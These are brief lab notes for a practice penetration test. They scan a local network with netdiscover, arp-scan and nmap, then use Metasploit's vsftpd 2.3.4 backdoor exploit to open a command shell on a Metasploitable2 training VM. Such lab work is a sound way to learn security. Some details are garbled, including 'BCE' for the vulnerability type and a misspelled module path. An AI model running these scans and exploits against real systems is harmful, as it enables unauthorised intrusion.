
ifconfig - To find your ip address

netdiscover -r 192.168.220.0/24 -i eth0

press ctrl +z or ctrl + c

(or)

arp-scan --localnet

default gateway -> route -n

nmap -sT -vv ip address of metasploitable2 vm

nmap -sV -p 21 ip address

version - vsftpd 2.3.4

go to google --> search for vsftpd 2.3.4 exploit

Vulnerability - BCE

In the terminal, type msfconsole
msf>search type:exploit vsftpd 2.3.4
msf>use exploit/unix/ftp/vstpd2.3.4
msf>show options
msf>set RHOST ip address of metasploitable2 vm
msf>exploit

command shell1 opened

ls
uname -a



